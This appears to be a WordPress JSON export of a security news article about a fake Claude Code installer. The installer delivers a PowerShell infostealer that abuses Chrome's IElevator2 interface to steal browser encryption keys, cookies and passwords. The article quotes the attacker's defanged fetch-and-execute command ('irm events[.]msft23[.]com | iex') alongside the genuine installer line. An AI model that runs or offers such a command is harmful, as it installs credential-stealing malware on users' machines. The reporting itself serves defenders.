{"id":8115,"date":"2026-05-12T11:32:37","date_gmt":"2026-05-12T11:32:37","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=8115"},"modified":"2026-05-12T11:32:37","modified_gmt":"2026-05-12T11:32:37","slug":"fake-claude-code-takes-the-ielevator-to-your-browser-secrets","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=8115","title":{"rendered":"Fake Claude Code takes the IElevator to your browser secrets"},"content":{"rendered":"
\n
\n
\n
\n
<\/div>\n

Developers looking for Anthropic\u2019s increasingly popular Claude Code tool are now being lured into downloading malware.<\/p>\n

According to researchers at Ontinue, attackers are abusing a fake Claude Code installer to deliver a previously undocumented PowerShell payload. The malware is designed to evade detection, recover browser encryption material, and steal sensitive data from developer systems.<\/p>\n

\u201cDevelopers hold the keys to an organization\u2019s most sensitive assets \u2013 intellectual property, cloud infrastructure, CI\/CD pipelines,\u201d said Vineeta Sangaraju<\/a>, AI Research Engineer at Black Duck. \u201cThey also, by necessity, need the freedom to download and install software. That combination makes them a high-value target.\u201d<\/p>\n

Ontinue researchers said that everything possibly detectable on the attack chain is wrapped within the PowerShell <\/a>loader, complicating detection. \u201cTwo standard API-chain rule sets we evaluated against the binary returned no matches,\u201d they said in a blog post<\/a>.<\/p>\n

The malware has \u201cgeographic exclusion\u201d enabled, which has it scan the host\u2019s Windows regions settings against a list of to-exclude geographies, namely all the CIS member states and Iran, and immediately abort execution if there\u2019s a match.<\/p>\n

Campaign replaces Claude Code\u2019s legitimate one-line setup<\/p>\n

According to Ontinue, the campaign depends on fake installer pages impersonating Claude Code distribution channels. However, rather than delivering Anthropic\u2019s legitimate one-line installation routine, \u201cirm https[:]\/\/claude[.]ai\/install.ps1 | iex,\u201d the pages serve attacker-controlled PowerShell commands (\u201cirm events[.]msft23[.]com | iex\u201d) that initiate a staged payload chain.<\/p>\n

Once executed, the malicious routine deploys multiple components intended to establish persistence while minimizing behavioral indicators typically associated with commodity malware loaders.<\/p>\n

\u201cEverything readily detected, SQLite database access, archive construction, HTTPS exfiltration, scheduled-task persistence, and the process-injection chain itself, resides exclusively within the PowerShell loader,\u201d the researchers said, adding that the native helper exposes no networking, cryptographic, or file-enumeration imports.<\/p>\n

The only telling sign is a single indirect COM vtable invocation, they noted.<\/p>\n

A list of things the malware can do, while hiding from the prying eyes, includes geographic exclusion, ID collection, browser enumeration, v10\/v20 key handling, PowerShell architecture matching and launch, decryption and collection, exfiltration, and persistence.<\/p>\n

\u201cSwapping a legitimate installer for a malicious one is not a new attack,\u201d Sangaraju pointed out. \u201cHowever, what makes this ongoing campaign notable is the precision with which it was built to evade the detection methods that most security teams rely on today. The malicious activity is deliberately structured to look benign to scanners.\u201d<\/p>\n

Chrome elevation services were abused to crack encryption<\/h2>\n

The researchers also wrote of the malware abusing Chrome Elevation Services to recover encryption material associated with Application-Bound Encryption (ABE) protections. The payload leverages the IElevator2 COM interface in Chrome to retrieve (ABE) encryption keys.<\/p>\n

This capability helped attackers access browser-protected data normally inaccessible by infostealers. Google introduced ABE in Chrome 127 in July 2024, specifically to keep commodity stealers from lifting cookies and saved passwords from the SQLite databases.<\/p>\n

Ontinue stopped short of making firm attribution claims as it found no match with published TTPs associated with popular families like Lumma<\/a>, StealC, Vidar, EDDIESTEALER, Katz, VoidStealer<\/a>, Storm, and XenoSteler, among others. The closest the researchers got to a match was with Glove Stealer, which also abuses IElevator, but they dismissed a direct attribution, citing six differing aspects.<\/p>\n

A YARA ruleset<\/a> and a set of indicators of compromise (IOCs<\/a>) were shared through GitHub repositories to support detection, with researchers recommending an additional set of best practices. These included enforcing PowerShell Constrained Language Mode, enabling phishing-resistant MFA authentication, enabling and verifying AMSI tamper protection, and blocking newly registered domains.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"

Developers looking for Anthropic\u2019s increasingly popular Claude Code tool are now being lured into downloading malware. According to researchers at Ontinue, attackers are abusing a fake Claude Code installer to deliver a previously undocumented PowerShell payload. The malware is designed to evade detection, recover browser encryption material, and steal sensitive data from developer systems. \u201cDevelopers […]<\/p>\n","protected":false},"author":0,"featured_media":8116,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-8115","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/8115"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8115"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/8115\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/8116"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8115"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8115"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8115"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}